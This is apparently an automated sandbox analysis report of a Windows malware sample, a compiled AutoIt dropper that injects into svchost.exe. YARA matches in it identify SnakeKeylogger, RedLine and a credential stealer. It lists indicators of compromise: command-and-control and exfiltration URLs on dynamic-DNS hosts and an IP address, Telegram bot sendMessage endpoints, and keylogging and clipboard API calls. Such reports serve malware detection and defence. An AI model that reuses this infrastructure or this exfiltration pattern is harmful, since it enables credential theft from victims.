              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 21:13:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608426145.0000000007B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enl
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: svchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: svchost.exe, 00000002.00000002.3934335927.000000000538E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: svchost.exe, 00000002.00000002.3934335927.00000000053B8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.0000000005425000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: svchost.exe, 00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3936515105.0000000006607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/l
              Source: svchost.exe, 00000002.00000002.3934335927.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49723 version: TLS 1.2
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00674164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00674164
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00674164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00674164
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00673F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00673F66
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0066001C
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0068CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0068CABC

              System Summary

              barindex
              Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.lsc5QN46NH.exe.21a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: This is a third-party compiled AutoIt script.0_2_00603B3A
              Source: lsc5QN46NH.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: lsc5QN46NH.exe, 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_52c4e1c3-8
              Source: lsc5QN46NH.exe, 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_afb52e6f-6
              Source: lsc5QN46NH.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b9a4a06c-9
              Source: lsc5QN46NH.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_52f5e33c-e
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0066A1EF
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00658310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00658310
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006651BD
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0060E6A00_2_0060E6A0
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0062D9750_2_0062D975
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0060FCE00_2_0060FCE0
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006221C50_2_006221C5
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006362D20_2_006362D2
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006803DA0_2_006803DA
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0063242E0_2_0063242E
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006225FA0_2_006225FA
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0065E6160_2_0065E616
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006166E10_2_006166E1
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0063878F0_2_0063878F
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006368440_2_00636844
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006808570_2_00680857
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006188080_2_00618808
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006688890_2_00668889
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0062CB210_2_0062CB21
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00636DB60_2_00636DB6
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00616F9E0_2_00616F9E
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006130300_2_00613030
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0062F1D90_2_0062F1D9
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006231870_2_00623187
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006012870_2_00601287
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006214840_2_00621484
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006155200_2_00615520
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006276960_2_00627696
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006157600_2_00615760
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006219780_2_00621978
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00639AB50_2_00639AB5
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00687DDB0_2_00687DDB
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0062BDA60_2_0062BDA6
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00621D900_2_00621D90
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0060DF000_2_0060DF00
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00613FE00_2_00613FE0
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_016453700_2_01645370
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408C602_2_00408C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC112_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407C3F2_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418CCC2_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406CA02_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028B02_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4BE2_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004182442_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016502_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F202_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004193C42_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187882_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F892_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B902_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004073A02_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786D7BF2_2_0786D7BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786C6B32_2_0786C6B3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_078676302_2_07867630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786D4EB2_2_0786D4EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786431B2_2_0786431B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786D2132_2_0786D213
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_07862F8B2_2_07862F8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786CF3B2_2_0786CF3B
